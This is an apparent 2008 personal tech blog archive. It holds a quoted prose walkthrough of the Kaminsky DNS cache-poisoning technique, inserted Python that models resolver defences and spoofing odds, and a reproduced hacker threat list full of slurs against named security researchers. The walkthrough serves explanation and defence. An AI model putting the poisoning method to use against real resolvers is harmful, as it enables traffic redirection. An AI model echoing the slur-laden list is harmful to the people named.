A couple of months ago I bought a PCMCIA UMTS card with a KPN subscription for Mobile Internet for my Mac PowerBook. Costs a couple of euro but it provides me with Internet access when not being able to connect to a cable, for whatever reason.
I bought a MacBook a little later and since it does not have a PCMCIA slot, got myself a HuaWei E270 USB device to go with it. The HuaWei USB will automount, show the drivers that need to be installed and does so with all the correct settings preloaded: if one runs some sort of windows.
I do not.
Luckily KPN provides a dmg with the correct config from their website for us 'few' MAC users. Nice.
Unfortunately my connection suffers from various problems:
- connection speed sucks: 100 KB/s toprate up & down
- HuaWei driver kernel panics OSX
- syslog takes up to 80[!!!] % of the CPU when being flooded by the HuaWei driver
- Use another OS [riiight!]
- Use another machine [Ok, give me one!]
- Have the HuaWei driver installed by a service point [it is!]
Most complaints are about the E220, but some mention the E226 and mine is the E270.
Luckily there is an updated version of the E270 driver available for OSX, unfortunately it is wrapped in a .EXE, sigh...
So much for using China products sold by the KPN.
Thursday 14 August 2008
Worthless
GOOD NEWS: Cervelat-Krise passed!
Life saver: The Brazilian Zebu*-cow-intestine can be imported into Europe again. After the bovine spongiform encephalopathy crisis it was verboten to import specific parts of the cows into Europe.
Since the Cervelat.CH needs the best available bowels for its perfect curve & taste, only the Zebu's intestine can do. Thank G*d this is allowed again.
* Well actually it is more [5/8] Chanchim, but they look like Zebu.
Wednesday 13 August 2008
Meester Boukema
Tuesday 12 August 2008
The best things in life are free...
...but you can give them to the birds and bees, I want money! How is that, you give away a kick ass front-end, secure IMAP & POP, more storage space than anyone and a near perfect service and everyone is silently using ad-blockers to prevent you from making money and you accept that. But when there is ONE DAY of availability issues with that kick ass service, people go ape shit and you even apologize!
I would like to thank the gmail team for exceeding all my expectations, consistently.
Sunday 10 August 2008
iPhone 2.0 but where is the...
..normal functions, like:
- SMS forwarding ?
- Copy & Paste ?
- MMS ?
- Video recording ?
- Blocking of unwanted phone calls ?
- Voice Recording ?
Even the PwnageTool looks better than iTimes FFS!
pdp's older mailbox volumes compromised, DUH!
"Great Council of Internet Superheros" [internetsuperheros@hushmail.com] has compromised Petko D. Petkov [AKA pdp]'s older mailbox RAR volumes and posted lots of it on RapidShare. They threaten a whole bunch of people:
The Judge for Security Sellout Crimes hereby wages war against:
|/| Tom Ferris @ adobe.com security-protocols.com
|/| Matasano LLC @ matasano.com sockpuppet.org
|/| Nate Lawson @ rootlabs.com
|/| Joanna Rutkowska @ trannyvideos.com
|/| Petko D. Petkov @ googlemail.com gnucitizen.org
|/| Matt Richard @ idefense.com
|/| /\) Toralv Dirro @ mcafee.com AVERT Labs
|/|/\/ Dan Kaminsky @ ioactive.com arkham.wstn.ioactive.com
|/|\/ Dror Shalev @ sec.drorshalev.com
(\\\) Dragos Riuiu @ gaysecwest.com
(\\\) Thorsten Holz @ honeynet.org mwcollect.org
(\\\) Andre Protas @ eeye.com mwcollect.org (IDA leaker)
(\\\) Gadi Evron @ linuxbox.org kosherobese.org
(\\\) Valdis Kletnieks @ vt.edu & his alcoholic mother
/\\/\ Robert Lemos @ securityfocus.com
/ ,^./\ Ryan Naraine @ zdnet.com gmail.com
/ / \/\ Beyond Security @ Isreal, Gadi's bitch tits
/ / \/\ SecReview @ blogspot.com (gay reviews)
( ( )/) Juha-Matti Laurio @ netti.fi & Isreal (blog moron)
| | |/| Sergio Alvarez @ gmail.com nruns.com (AV rapist)
| | DIE |/| Theo de Raadt @ cvs.openbsd.org gaydate.com
| | |/| Alan Shimel @ yahoo.com stillsecure.com
( ( )/) Lance M. Havok @ dumb.lame.idiot.pl
\ \ / / kingcope/kcope @ gmx.net lame.idiot.de
\ `---' / Jennifer Granick @ whitefat.defender.lame
`-----' David Maynor @ gmail.com erratasec.com apple.com
Andrew Cushman @ microsoft.com gossip.sec
I wonder where this is going to end. Some big names here and I am sure not all will take it lying down. The compromise of pdp's account should warn people...
Thursday 7 August 2008
Andrea Pininfarina --- morte

On a Vespa [style] Andrea Pininfarina, the CEO of the best car designing company ever, has died.
He and his Vespa scooter collided with a Ford Fiesta[FFS] about 8:15 a.m. in Trofarello.
Andrea died, Vespa broke, Fiesta lives: where is the justice in this?
Tuesday 5 August 2008
Never ever ever talk to the police
As an investigator, I can only agree: everything you say can and will be used against you. One of my most respected teachers on the subject taught me another trick. It comes down to screaming 'I NEED HELP' and I will leave it to the reader to think up the context as in when the time has come to [ab-]use this.
Most people are not even aware that LYING is allowed in the process of interrogation...
Thanks Bruce
Saturday 2 August 2008
My TraceRoute for OSX?
checking sys/xti.h presence... no
checking for sys/xti.h... no
checking for floor in -lm... yes
./configure: line 6742: syntax error near unexpected token `1.0.0,'
./configure: line 6742: ` AM_PATH_GTK(1.0.0, CFLAGS="$CFLAGS $GTK_CFLAGS"'
MyTraceRoute is a kick ass network connection 'debug' implementation that sends a sequence of ICMP ECHO requests to each hop to determine the quality of the link to each machine. As it does this, it prints running statistics about each machine.
iPhone:~ root# ./mtr --report www.google.com
HOST: iPhone Loss% Snt Last Avg Best Wrst StDev
1. 192.168.1.2 0.0% 10 2.0 9.6 1.9 72.4 22.1
[SNIP]
14. 12.88.155.14 66.7% 9 24.4 63.0 20.7 143.8 70.0
15. 216.239.48.110 87.5% 8 23.7 23.7 23.7 23.7 0.0
16. 66.249.95.149 25.0% 8 38.0 37.0 35.1 39.8 1.7
17. ??? 100.0 8 0.0 0.0 0.0 0.0 0.0
18. 209.85.253.161 14.3% 7 46.7 44.4 36.9 50.6 5.3
19. 74.125.47.104 85.7% 7 36.8 36.8 36.8 36.8 0.0
Simple, light & uses stuff we have been using for years, just a little better. The way I like it. It runs nicely on the iPhone, install it via Cydia, but for the love of cheese I can not compile it on my OSX Darwin MacBook.
Anyone?
Friday 1 August 2008
Switzerland FTW!

1st of August is Switzerland's national day. On this day Swiss people burn stuff, while speaking a funny language.
One of the two most beautiful countries in the world, in my book. And certainly the one country with the best possible implementation of a democracy.
They do not work too efficiently, following Canada and being trailed by Trinidad & Tobago on the GDP list, but that makes it only extra pleasant to live there.
Today I wish all people with a @.CH email address a super nice day with many friends and even more fire!
Tuesday 29 July 2008
Search and you will WHAT???
It is amazing how difficult it is to build a better google. The latest attempt is called cuil and it too, fails.
I challenge you to find anything. So far only the simplest of searches yields usable results. Like searching for linkedin actually gives www.linkedin.com as a first hit: well done. Searching for 'mokum von Amsterdam' gives two pages of something I once posted on the Wired blog and that has been replicated 1.000 times on other sites: no link to this blog or anything useful.
Try searching for 'ING bank' in google and in cuil. Tell me why on earth ING Poland & Timisoara show up in Cuil on page one? How on earth did these guys fill up their repository?
Altavista does better FFS! [as a matter of fact, altavista showed me a nice bar in Berlin I will visit next time around].
Lessons learned: stick to google, use altavista more often, wait till cuil grows up, if ever.
Monday 28 July 2008
THE KIDNAPPING
Friday 25 July 2008
Why OpenDNS [if you can not run DJBDNS]
bash-3.2# cat /etc/resolv.conf
nameserver 208.67.222.222
nameserver 208.67.220.220
nameserver 62.133.126.28
nameserver 62.133.126.29
The top two addresses are my 'normal' DNS entries, from the fine folks of OpenDNS [who were secure since day one].
Now let's check the DNS servers from both OpenDNS & KPN mobile with a simple dig:
bash-3.2# dig @208.67.220.220 +short porttest.dns-oarc.net TXT
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"208.69.34.6 is GOOD: 28 queries in 1061.8 seconds from 28 ports with std dev 17429.24"
bash-3.2# dig @208.67.222.222 +short porttest.dns-oarc.net TXT
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"208.69.34.4 is GOOD: 26 queries in 4.3 seconds from 26 ports with std dev 20231.33"
bash-3.2# dig @62.133.126.28 +short porttest.dns-oarc.net TXT
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"62.133.126.28 is POOR: 26 queries in 4.2 seconds from 1 ports with std dev 0.00"
bash-3.2# dig @62.133.126.29 +short porttest.dns-oarc.net TXT
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"62.133.126.29 is POOR: 26 queries in 4.2 seconds from 1 ports with std dev 0.00"
Of course, nothing beats djbdns, but for day-to-day use, OpenDNS p0wnserz your provider's DNS hands down.
To keep your resolv.conf file safe and clean on OSX and prevent DHCP from updating it, set the immutable bit:
chflags uchg /var/run/resolv.conf
To remove the flag use:
chflags nouchg /var/run/resolv.conf
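The porttest check above, scripted so it can be repeated over a list of resolvers. This is an added example, not part of the original post: it parses the TXT answers copied from the dig output above and flags resolvers whose queries all left from one source port. The function names and the flagging rule beyond the service's own GOOD/POOR rating are assumptions made here.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Output lines copied from the dig session in this post (CNAME line + TXT text).
SAMPLE_TXT = [
    'z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.',
    '"208.69.34.6 is GOOD: 28 queries in 1061.8 seconds from 28 ports with std dev 17429.24"',
    '"208.69.34.4 is GOOD: 26 queries in 4.3 seconds from 26 ports with std dev 20231.33"',
    '"62.133.126.28 is POOR: 26 queries in 4.2 seconds from 1 ports with std dev 0.00"',
    '"62.133.126.29 is POOR: 26 queries in 4.2 seconds from 1 ports with std dev 0.00"',
]

LINE = re.compile(
    r'^"?(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is (?P<rating>[A-Z]+): '
    r'(?P<queries>\d+) queries in (?P<seconds>[\d.]+) seconds '
    r'from (?P<ports>\d+) ports with std dev (?P<std_dev>[\d.]+)"?$'
)


@dataclass(frozen=True)
class PortTest:
    egress_ip: str   # address the test server saw the queries come from
    rating: str      # the service's own verdict (GOOD / POOR in the samples)
    queries: int
    seconds: float
    ports: int       # number of distinct source ports observed
    std_dev: float   # spread of the observed source ports


def parse_porttest(txt: str) -> Optional[PortTest]:
    """Parse one TXT answer; return None for lines that are not a result."""
    m = LINE.match(txt.strip())
    if m is None:
        return None
    return PortTest(
        egress_ip=m.group("ip"),
        rating=m.group("rating"),
        queries=int(m.group("queries")),
        seconds=float(m.group("seconds")),
        ports=int(m.group("ports")),
        std_dev=float(m.group("std_dev")),
    )


def weak_source_ports(result: PortTest) -> bool:
    """Assumed rule: anything not rated GOOD, or a single fixed port, is weak."""
    return result.rating != "GOOD" or result.ports <= 1 or result.std_dev == 0.0


def flag_resolvers(lines: Iterable[str]) -> List[str]:
    """Return the egress addresses of resolvers with predictable source ports."""
    flagged = []
    for line in lines:
        result = parse_porttest(line)
        if result is not None and weak_source_ports(result):
            flagged.append(result.egress_ip)
    return flagged


if __name__ == "__main__":
    for ip in flag_resolvers(SAMPLE_TXT):
        print(f"{ip}: fixed source port, replace this resolver")
```

Note that the address in the result is the resolver's egress address, which can differ from the address you queried, as it does for the two OpenDNS entries.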
Wednesday 23 July 2008
CloudTablet or CloudPannel?

Interesting idea over at TechCrunch: a simple, US$200 WebTablet, running FireFox & Skype.
For me this is the ultimate CloudPannel [zero hits ATM], or CloudTablet [less than 350 hits ATM], whatever you prefer.
I would like 5 or 10 lying around the house for easy web 2.0 access!
Tuesday 22 July 2008
DNS issues released
The cat is out of the bag. Yes, Halvar Flake figured out the flaw Dan Kaminsky will announce at Black Hat.
1.
Pretend for the moment that you know only the basic function of DNS — that it translates WWW.VICTIM.COM into 1.2.3.4. The code that does this is called a resolver. Each time the resolver contacts the DNS to translate names to addresses, it creates a packet called a query. The exchange of packets is called a transaction. Since the number of packets flying about on the internet requires scientific notation to express, you can imagine there has to be some way of not mixing them up.
Bob goes to a deli, to get a sandwich. Bob walks up to the counter, takes a pointy ticket from a round red dispenser. The ticket has a number on it. This will be Bob’s unique identifier for his sandwich acquisition transaction. Note that the number will probably be used twice — once when he is called to the counter to place his order and again when he’s called back to get his sandwich. If you’re wondering, Bob likes ham on rye with no onions.
If you’ve got this, you have the concept of transaction IDs, which are numbers assigned to keep different transactions in order. Conveniently, the first sixteen bits of a DNS packet is just such a unique identifier. It’s called a query id (QID). And with the efficiency of the deli, the QID is used for multiple transactions.
2.
Until very recently, there were two basic classes of DNS vulnerabilities. One of them involves mucking about with the QID in DNS packets and the other requires you to know the Deep Magic.
First, QIDs.
Bob’s a resolver and Alice is a content DNS server. Bob asks Alice for the address of WWW.VICTIM.COM. The answer is 1.2.3.4. Mallory would like the answer to be 6.6.6.0.
It is a (now not) secret shame of mine that for a great deal of my career, creating and sending packets was, to me, Deep Magic. Then it became part of my job, and I learned that it is surprisingly trivial. So put aside the idea that forging IP packets is the hard part of poisoning DNS. If I’m Mallory and I’m attacking Bob, how can he distinguish my packets from Alice’s? Because I can’t see the QID in his request, and the QID in my response won’t match. The QID is the only thing protecting the DNS from Mallory (me).
QID attacks began in the olden days, when BIND simply incremented the QID with every query response. If you can remember 1995, here’s a workable DNS attack. Think fast: 9372 + 1. Did you get 9372, or even miss and get 9373? You win, Alice loses. Mallory sends a constant stream of DNS responses for WWW.VICTIM.COM. All are quietly discarded — until Mallory gets Bob to query for WWW.VICTIM.COM. If Mallory’s response gets to your computer before the legitimate response arrives from your ISP’s name server, you will be redirected where Mallory tells you you’re going.
Obvious fix: you want the QID to be randomly generated. Now Alice and Mallory are in a race. Alice sees Bob’s request and knows the QID. Mallory has to guess it. The first one to land a packet with the correct QID wins. Randomized QIDs give Alice a big advantage in this race.
But there’s a bunch more problems here:
- If you convince Bob to ask Alice the same question 1000 times all at once, and Bob uses a different QID for each packet, you made the race 1000 times easier for Mallory to win.
- If Bob uses a crappy random number generator, Mallory can get Bob to ask for names she controls, like WWW.EVIL.COM, and watch how the QIDs bounce around; eventually, she’ll break the RNG and be able to predict its outputs.
- 16 bits just isn’t big enough to provide real security at the traffic rates we deal with in 2008.
Your computer’s resolver is probably a stub. Which means it won’t really save the response. You don’t want it to. The stub asks a real DNS server, probably run by your ISP. That server doesn’t know everything. It can’t, and shouldn’t, because the whole idea of DNS is to compensate for the organic and shifting nature of internet naming and addressing. Frequently, that server has to go ask another, and so on. The cool kids call this “recursion”.
Responses carry another value, too, called a time to live (TTL). This number tells your name server how long to cache the answer. Why? Because they deal with zillions of queries. Whoever wins the race between Alice and Mallory, their answer gets cached. All subsequent responses will be dropped. All future requests for that same data, within the TTL, come from that answer. This is good for whoever wins the race. If Alice wins, it means Mallory can’t poison the cache for that name. If Mallory wins, the next 10,000 or so people that ask that cache where WWW.VICTIM.COM is go to 6.6.6.0.
3.
Then there’s that other set of DNS vulnerabilities. These require you to pay attention in class. They haven’t really been talked about since 1997. And they’re hard to find, because you have to understand how DNS works. In other words, you have to be completely crazy. Lazlo Hollyfeld crazy. I’m speaking of course of RRset poisoning.
DNS has a complicated architecture. Not only that, but not all name servers run the same code. So not all of them implement DNS in exactly the same way. And not only that, but not all name servers are configured properly.
I just described a QID attack that poisons the name server’s cache. This attack requires speed, agility and luck, because if the “real” answer happens to arrive before your spoofed one, you’re locked out. Fortunately for those of you that have a time machine, some versions of DNS provide you with another way to poison the name server’s cache anyway. To explain it, I will have to explain more about the format of a DNS packet.
DNS packets are variable in length and consist of a header, some flags and resource records (RRs). RRs are where the goods ride around. There are up to three sets of RRs in a DNS packet, along with the original query. These are:
- Answer RR’s, which contain the answer to whatever question you asked (such as the A record that says WWW.VICTIM.COM is 1.2.3.4)
- Authority RR’s, which tell resolvers which name servers to refer to to get the complete answer for a question
- Additional RR’s, sometimes called “glue”, which contain any additional information needed to make the response effective.
A word about the Additional RR’s. Think about an NS record, like the one that COM’s name server uses to tell us that, to find out where WWW.VICTIM.COM is, you have to ask NS1.VICTIM.COM. That’s good to know, but it’s not going to help you unless you know where to find NS1.VICTIM.COM. Names are not addresses. This is a chicken and egg problem. The answer is, you provide both the NS record pointing VICTIM.COM to NS1.VICTIM.COM, and the A record pointing NS1.VICTIM.COM to 1.2.3.1.
Now, let’s party like it’s 1995.
Download the source code for a DNS implementation and hack it up such that every time it sends out a response, it also sends out a little bit of evil — an extra Additional RR with bad information. Then let’s set up an evil server with it, and register it as EVIL.COM. Now get a bunch of web pages up with IMG tags pointing to names hosted at that server.
Bob innocently loads up a page with the malicious tags which coerces his browser to resolve that name. Bob asks Alice to resolve that name. Here comes recursion: eventually the query arrives at our evil server. Which sends back a response with an unexpected (evil) Additional RR.
If Alice’s cache honors the unexpected record, it’s 1995 — buy CSCO! — and you just poisoned their cache. Worse, it will replace the “real” data already in the cache with the fake data. You asked where WWW.EVIL.COM was (or rather, the image tags did). But Alice also “found out” where WWW.VICTIM.COM was: 6.6.6.0. Every resolver that points to that name server will now gladly forward you to the website of the beast.
4.
It’s not 1995. It’s 2008. There are fixes for the attacks I have described.
Fix 1:
The QID race is fixed with random IDs, and by using a strong random number generator and being careful with the state you keep for queries. 16 bit query IDs are still too short, which fills us with dread. There are hacks to get around this. For instance, DJBDNS randomizes the source port on requests as well, and thus won’t honor responses unless they come from someone who guesses the ~16 bit source port. This brings us close to 32 bits, which is much harder to guess.
Fix 2:
The RR set poisoning attack is fixed by bailiwick checking, which is a quirky way of saying that resolvers simply remember that if they’re asking where WWW.VICTIM.COM is, they’re not interested in caching a new address for WWW.GOOGLE.COM in the same transaction.
Remember how these fixes work. They’re very important.
And so we arrive at the present day.
5.
Let’s try again to convince Bob that WWW.VICTIM.COM is 6.6.6.0.
This time though, instead of getting Bob to look up WWW.VICTIM.COM and then beating Alice in the race, or getting Bob to look up WWW.EVIL.COM and slipping strychnine into his ham sandwich, we’re going to be clever (sneaky).
Get Bob to look up AAAAA.VICTIM.COM. Race Alice. Alice’s answer is NXDOMAIN, because there’s no such name as AAAAA.VICTIM.COM. Mallory has an answer. We’ll come back to it. Alice has an advantage in the race, and so she likely beats Mallory. NXDOMAIN for AAAAA.VICTIM.COM.
Alice’s advantage is not insurmountable. Mallory repeats with AAAAB.VICTIM.COM. Then AAAAC.VICTIM.COM. And so on. Sometime, perhaps around CXOPQ.VICTIM.COM, Mallory wins! Bob believes CXOPQ.VICTIM.COM is 6.6.6.0!
Poisoning CXOPQ.VICTIM.COM is not super valuable to Mallory. But Mallory has another trick up her sleeve. Because her response didn’t just say CXOPQ.VICTIM.COM was 6.6.6.0. It also contained Additional RRs pointing WWW.VICTIM.COM to 6.6.6.0. Those records are in-bailiwick: Bob is in fact interested in VICTIM.COM for this query. Mallory has combined attack #1 with attack #2, defeating fix #1 and fix #2. Mallory can conduct this attack in less than 10 seconds on a fast Internet link.
----
On a side note: can stuff no longer published but found in google's cache be copyrighted?
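The two fixes from the quoted write-up, seen from the resolver's side. This is an added example, not code from the write-up or from any real resolver: it shows the acceptance check (QID and source port must match, out-of-bailiwick records are dropped) and why the in-bailiwick Additional RR survives it, leaving the guess space as the only barrier. All class and function names, the 6.6.6.1 address and the traffic numbers are constructed for illustration, and real resolvers derive the bailiwick from the delegation they followed.

```python
import math
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class RR:
    name: str
    rtype: str
    data: str


@dataclass(frozen=True)
class Pending:
    """State the resolver keeps for one outstanding query."""
    qname: str
    qid: int        # 16-bit query id it chose
    src_port: int   # UDP source port it sent from
    zone: str       # bailiwick: the zone the queried server answers for


@dataclass(frozen=True)
class Response:
    qid: int
    dst_port: int
    answers: Tuple[RR, ...]
    additional: Tuple[RR, ...] = ()


def _norm(name: str) -> str:
    return name.rstrip(".").lower()


def in_bailiwick(name: str, zone: str) -> bool:
    """True if name is the zone itself or sits below it (label boundary)."""
    name, zone = _norm(name), _norm(zone)
    return name == zone or name.endswith("." + zone)


def accept(pending: Pending, resp: Response) -> Optional[List[RR]]:
    """Fix 1: drop responses with a wrong QID or port. Fix 2: cache only
    records inside the bailiwick. Returns the cacheable records or None."""
    if resp.qid != pending.qid or resp.dst_port != pending.src_port:
        return None
    return [rr for rr in resp.answers + resp.additional
            if in_bailiwick(rr.name, pending.zone)]


def guess_bits(qid_values: int, port_values: int) -> float:
    """Bits an off-path sender must guess: QID space times port space."""
    return math.log2(qid_values) + math.log2(port_values)


def spoof_chance(forged_per_race: int, races: int, bits: float) -> float:
    """Chance that at least one of `races` races is won when each race sees
    `forged_per_race` blind guesses against a `bits`-bit space."""
    per_race = min(1.0, forged_per_race / 2 ** bits)
    return 1.0 - (1.0 - per_race) ** races


def scenarios() -> dict:
    glue = RR("www.victim.com", "A", "6.6.6.0")
    # 1995-style RRset poisoning: query was for evil.com, glue is out of zone.
    q1 = Pending("www.evil.com", 0x1A2B, 40001, "evil.com")
    r1 = Response(0x1A2B, 40001, (RR("www.evil.com", "A", "6.6.6.1"),), (glue,))
    # 2008-style: random sibling name, glue is inside victim.com's bailiwick.
    q2 = Pending("cxopq.victim.com", 0x3C4D, 40002, "victim.com")
    ans = (RR("cxopq.victim.com", "A", "6.6.6.0"),)
    hit = Response(0x3C4D, 40002, ans, (glue,))
    miss = Response(0x0001, 40002, ans, (glue,))
    return {
        "rrset_1995": [rr.name for rr in accept(q1, r1)],
        "in_bailiwick_2008": [rr.name for rr in accept(q2, hit)],
        "wrong_qid": accept(q2, miss),
    }


if __name__ == "__main__":
    print(scenarios())
    for label, bits in (("fixed port", guess_bits(65536, 1)),
                        ("random port", guess_bits(65536, 65536))):
        # Constructed load: 100 forged responses per race, 1000 races.
        print(label, bits, "bits ->", spoof_chance(100, 1000, bits))
```

With the constructed load, a fixed source port gives a roughly 78% chance of one successful forgery, while a randomized port drops it to about 0.002%, which is why the 1-port result in the porttest matters.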
Geotagging iPhone gone bad :(
Great feature: geotagging the images taken with the iPhone [already the most Popular Cameraphone on Flickr]. Just imagine that you take photos during the holiday and all you need to do is dump them in, say, google earth and all pics are shown in the correct location. Right, that was the plan. Unfortunately Apple made a couple of errors with the implementation, again.
The UIImagePicker application that is used when you email a photo from the iPhone, strips out the EXIF location data, DUH! iPhoto mutilates [strips the "Ref" tag] the EXIF geodata when resizing photos, DUH.
So what you get is third party apps that sort-of-help, like AirMe. It will upload the photo to Flickr and geotag it, but then you have to take the pic with AirMe and have NO geodata stored in the EXIF data of the photo at all, and that is bad.
Who knows, maybe if Apple would put a little less in vain effort in the locking down of the iPhone they'd be able to get MMS working? Some more features in the camera? Geotagging stored correctly? How difficult is that? How come 17-year-olds CAN do that but a multi billion company can't?
Monday 21 July 2008
Italians...
To wrap it up, even in the IT world they show up. And the pain got a name: Zibri. A thief, but then in code.
Read this to get an idea about this crook:
The following opinions are mine, and not those of the DevTeam as a whole, although many members agree with me:
Free thoughts...
There's something that's been on my chest for a while, and it's been bothering others on the team as well. The name of this particular thorn in our sides begins with the letter Z and ends with "ibri". Yes, I'm sure all of you are rolling your eyes at the "drama" we hacker "kids" are stirring up, but I'm sure if you had your work taken without permission, you would feel the same way. It's particularly galling that he is still spreading FUD on his blog in an attempt to save face. I'm going to try to address some of them in this post.
Zibri implies that our jailbreak is not "real", saying instead that our release is a "software upgrade, total internat [sic] firmware modification and custom firmware".
For him, a "real hack" works in a few minutes because it only needs to modify a few bytes here and there.
When Pwnage 1.0 was released, it was indeed the ultimate hack for the iPhone/iPod Touch. Never before had the devices been under the user's control from the very bottom up. Prior, less sophisticated jailbreaks were still subject to the whims of the kernel, which couldn't be modified because the bootloader checked its signature and refused to boot if it was incorrect.
Back in those days, the definition of "hack" above was still a feasible one, as the chain of trust ended at the kernel. Once you gained write access to the root filesystem, you could run arbitrary programs and make patches at will to many system components. Indeed, many such patches were needed, to make activation allow unapproved SIM cards, and to make Springboard display unauthorized apps.
Fast forward back to the present, and you'll see the situation has changed. Solutions that using a ramdisk simply made a change or two to the filesystem now must contend with the mighty kernel's signature checking of all installed apps and libraries. Mounting the root filesystem and modifying /etc/fstab to make it writable is quite alright, but the moment you make patches for activation or anything else, the kernel will refuse to run the modified programs, unless you can somehow steal Apple's private signing key. Furthermore, such a jailbreak would be essentially useless because the system would refuse to run any of your custom software (such as Installer.app or Cydia), again because of the lack of signatures on it.
Given the above situation, it becomes clear that if you want to use 2.0 for anything but screenshots, you either need to get ahold of Apple's signing key (start preparing your army now) or you need to patch the 2.0 kernel. Hard as we tried, we couldn't find much of an army, so we took the latter approach.
We adapted our Pwnage technique to the 2.0 firmware, using a new unreleased exploit that we'd been keeping to ourselves, in the hope that Apple wouldn't patch it. This allows us to cut the signature checks out of the device bootloaders, allowing us to remove signature checking from the kernel, and enabling you to run all the custom software and patches you please.
Please note other than my facetious army suggestions, patching the bootloaders is the _only_ way to get a functional jailbreak for 2.0. Under the aforementioned definition of "real hack", there is no such thing as a "real hack" for 2.0. I hope you agree with me by now that Pwnage, the exploit it uses, and its subsequent obliteration of the device's chain of trust, is a "real hack".
More FUD is spread by this undying rumor of "Palladium" (or TPM) being used fully on Apple's devices, making it impossible for you "to play online with legit buyers." This is nothing but uninformed nonsense, and while there is the potential for some definition of trusted computing on iPhone and iPod Touch, Apple is not using it, and they have no way to remotely distinguish your pwned device from a legitimately activated one. This should have been obvious from our examples of running App Store applications next to our custom ones, but "obvious" is a very relative term.
On an unrelated note, I and the others take issue with Zibri's definition of open source. No, Linux distributions are not stealing, but our work was not released as open source, with any kind of permissive license, so the open source he brings into the discussion is entirely irrelevant. He took our work, our private exploits (such as the unreleased one we were able to use for Pwning 2.0), and without our permission (trying to defame us with fake comments, no less) used them in his work, that he made significant amounts of money on. He did this not by selling "his work", but by portraying himself as the reasonable "dev" who fought against the tyranny of the dev team and Apple, and requesting donations to his "cause" (recall his older iphone-elite.googlecode.com and his self-righteous bashing of the dev team for accepting donations; funny how principles change). Furthermore, with his millions of hits and occasionally obscene ads, he made his site into a complete money machine. So although he did not sell our work, it is more than fair to say that he made plenty of money from it.
And as to his most recent update, I'm not really sure what to say. I'd call it the swan song, but that would imply he was a swan, which is certainly not my intention. Maybe the chicken song would be more appropriate. ZiPhone was "developed" 9 months after the iPhone release, so he's justifying his lack of releases now, okay. Once again he pushes the "real hack" idea, which we hope we've already pounded sufficiently into the ground above. We're not sure how the fact that we were so popular it took down multiple unmetered gigabit servers is a point in his favor. We've had close to a third of his total visits since last week.
I want to dedicate a special paragraph to something that's been bugging us for a while, too. The myth that ZiPhone never harmed a phone. Certainly, we all know that iPhones are almost impossible to brick, but flashing unmatched fls/eep pairs to the baseband is plain irresponsible on Zibri's part. Does he not care about messing up phones, or does he simply not know better? And the laughable WiFi fix he released for issues that he called "user error" (actually a consequence of the above design choice) where he unconditionally set every ZiPhone WiFi MAC address to 0:Z:i:b:r:i? How did he expect that to work? It doesn't take a networking genius to figure out that two such phones on the same network would cause havoc, and indeed it did.
The following few "facts" on his blog are just more FUD. Our tools can't kill iPhones, because the only way to kill an iPhone through software (and even then just the radio) is to flash an incomplete image as the S-Gold bootloader. Apple cannot remotely kill pwned iPhones because as I mentioned earlier, it has no way to detect which iPhones are pwned.
I'm not sure why he goes on to say that you should be satisfied with Apple's AppStore. It certainly contains many good programs, but to quote Zibri just a couple of weeks earlier:
As of today you will have 2 choices:
1) Believe in the community and don't upgrade to 2.0
2) Say goodbye to Installer and freedom and upgrade.
So are you suggesting we say goodbye to freedom now? I guess we can't expect much from someone who made a reputation for himself by denouncing the devteam for accepting donations (not even soliciting them) and who now has a website full of ads, exhortations to donate, and very little content? Now we have given you a nice opportunity to upgrade to 2.0, use the AppStore _and_ use community apps. If he really wanted the good of the community, why is he not recommending it?
I would normally just ignore his entries, but as many still look at Zibri as an authority in the scene, I felt the need to dispel some of the FUD he was spreading, and finally denounce his pathetic attempts to stay relevant. Posting the latest root filesystem key after we release PwnageTool? PwnageTool exposes all the keys right within its plist files. And if he knew about the DFU exploit all along, as he implies, why didn't he take advantage of it? We would like to see him write up an article on how it all works, just to prove that Zibri knows all.
Thank you for your patience reading this. We will continue working hard on providing quality hacks and software, but please, to anyone who's tempted, stop spreading bullshit about us and our work. source
Friday 18 July 2008
How big is your I-EGO?

My I-EGO is pretty big, people tell me. But how big is it really? Time to find out!
Enter your name & domain and let www.egosurf.org do the rest.
My 'mokum von Amsterdam' EGO is a mere 4700 points but I am sure yours is a lot bigger :P
Shabat shalom!
Thursday 17 July 2008
I just text to say...
Tuesday 15 July 2008
Saturday 12 July 2008
BattleField 2: new patch 1.5 and 3 new maps
3 new maps will be released with it [act of G*d clause applies].
The names of the maps I cannot reveal but there will be at least one _you_ will like :P
Thursday 10 July 2008
Queuing for the iPhone 2.0
In Rotterdam there is a [modest] queue for the T-Mobile shop that will start selling the iPhone 2.0 from 00:00 sharp. 500 phones are available to those that have no friends, no home, no sex and no lust for beer.
Mine will fall out of the air real soon now, but I cannot say I am half as tense as I was with the iPhone original a year ago.
Wednesday 9 July 2008
SSH scanning on the rise. DENYHOSTS

DenyHosts blocked 44 new ssh user scanning hosts in the last 13 hours. That is a lot.
Normally, days with >5 new hosts caught by my lone sensor are remarkable; it happens no more often than 4 times a month. This month has been truly busy, however: July 1st 10 new addresses, July 3rd 14, whereas in the whole month of June there were 2 days with >5 [6 & 8 on the 28th & 30th. A busy month globally] with a grand total of 28 for the whole month.
Nothing advanced either, like the botnet-like scanning in May.
This is for those hosts who made it to the largest blacklist of all times.
Monday 7 July 2008
My users are smarter than yours!
2. Internet Explorer 123 31.62%
3. Safari 34 8.74%
4. Opera 8 2.06%
5. Mozilla 2 0.51%
6. Netscape 1 0.26%
Tuesday 1 July 2008
Google's Street View spycar clocked in Amsterdam, Holland

I think this is a first: a google car in Amsterdam. Photo taken on the 1st of July 2008 in Amsterdam, on the Gaasperdammerweg, Amsterdam after I picked up the car coming out of the Huigenbos [I know, all these streets do not sound like Amsterdam... but it is, technically speaking].
In a year or so you can see me doing silly :P
Tuesday 24 June 2008
I should have...
I should have written about the conversations we had.
I should have written about the nail biting, before and during the football game.
I should have because the moments mattered to me.
